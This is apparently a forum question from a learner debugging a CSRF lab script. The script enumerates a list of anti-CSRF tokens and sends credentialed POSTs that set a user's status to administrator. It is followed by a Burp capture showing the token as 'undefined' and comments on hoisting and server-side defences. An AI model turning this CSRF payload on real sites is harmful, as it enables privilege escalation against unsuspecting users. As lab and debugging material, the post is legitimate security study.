I am currently working on a CSRF lab exercise in which the challenge is to iterate through more than 20 tokens.
<script>
// Lab script: for every candidate anti-CSRF token in the list, send one
// form-encoded POST with the victim's cookies to the lab endpoint.
// Defender's view: every header set below is CORS-safelisted, so the browser
// sends the request without a preflight; what stops it server-side is a
// per-session, unpredictable token check (a token drawn from a small fixed
// pool can be enumerated), an Origin check (the capture shows "Origin: null"),
// and SameSite cookies.
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
// submitRequest is declared inside the loop body and invoked once per iteration.
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
// Ask the browser to attach cookies for the target origin; the captured
// request carries the PHPSESSID cookie.
xhr.withCredentials = true;
// NOTE(review): the `i` read here is NOT the outer loop counter. The
// `for (var i ...)` two statements below declares `i` with `var`, which is
// function-scoped and hoisted to the top of submitRequest, so it shadows the
// outer `i`. At this point the local `i` exists but has not been assigned,
// so token[i] is token[undefined], i.e. undefined, and string concatenation
// turns it into the text "undefined" -- the csrf=undefined seen in the proxy.
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
// Copy the body into a byte array, one character code per element (the
// body built above is plain ASCII).
var aBody = new Uint8Array(body.length);
// This `var i` is the declaration that shadows the outer loop counter.
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// .call() with no arguments simply invokes the function.
submitRequest.call();
};
</script>
In my code, I am using `+token[i]+` to insert the token into the `csrf` parameter, but when I inspect the request(s) in Burp Suite, the token has been replaced with "undefined":
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
I'm looking for guidance on what I am misunderstanding or doing incorrectly here. I am relatively new to JavaScript, so could it be that `+token[i]+` is not the correct approach for this task?